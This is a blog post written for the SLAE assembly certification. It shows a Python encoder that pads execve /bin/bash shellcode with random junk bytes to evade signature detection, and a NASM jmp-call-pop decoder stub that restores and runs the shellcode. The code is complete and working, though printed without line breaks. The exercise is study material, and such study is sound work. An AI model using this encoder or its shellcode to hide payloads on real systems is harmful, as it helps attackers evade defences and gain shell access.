Source: SecurityTube
Ok, here I will show simple Enconder/decoder, source code can be found in github.
How encoder work:
- Get random number between 1-3 (link to python encoder script)
- After add control number to shellcode, add junk bytes
Example:
------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
------------------------------------------------------------------
G - good byte, shellcode byte
C - control number, help us control junk bytes to escape
J - Junk bytes
#!/usr/bin/python from random import randint #30 bytes #shellcode - execve stack version def get_random(ident): if ident == 'number': return randint(1,3) elif ident == 'char': return randint(65,122)#only [a-z[]\^_`A-Z] shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") encoded = "" #end = "\\xf0\\x0d" for x in bytearray(shellcode): encoded += '\\x%02x' % x random = get_random('number') encoded += '\\x%02x' % random for i in range(random-1): encoded += '\\x%02x' % get_random('char') #encoded += end #probably we will need it for correct jump print encoded print print encoded.replace("\\x", ",0x")[1:] print 'Initial len: %d, encoded len: %d' % (len(shellcode), len(encoded)/4)
Decoder.nasm
section .text global _start _start: jmp short end ; jmp pop call decoder: xor eax, eax ; clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx pop edx ; get addr of shellcode putted by call starter push edx ; backup for call :D mov esi, edx ; mov shellcode start addr to esi (source) mov edi, edx ; mov shellcode start addr to edi (destination) inc esi ; point to the first dest byte, how many bytes we need to remove/espace inc edi ; point to the first random number mov cl, 89 ; loop counter/your shellcode length, if you use diferent shellcode need adjust it restore: ;decode xor eax, eax xor ebx, ebx mov al, byte [edi] ; read distance to next byte add eax, edi ; eax = addr of the next valid byte mov bl, byte [eax] ; bl = next valid byte of the shellcode mov byte [esi], bl ; move it to the final position mov edi, eax ; put latest valid pisition into edi inc edi ; next distance inc esi ; next valid byte loop restore ; loop pop ecx ; call shellcode call ecx xor eax, eax ; exit the shellcode (if it returns) mov al, 1 xor ebx,ebx int 0x80 end: call decoder ; put shellcode addr into stack shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario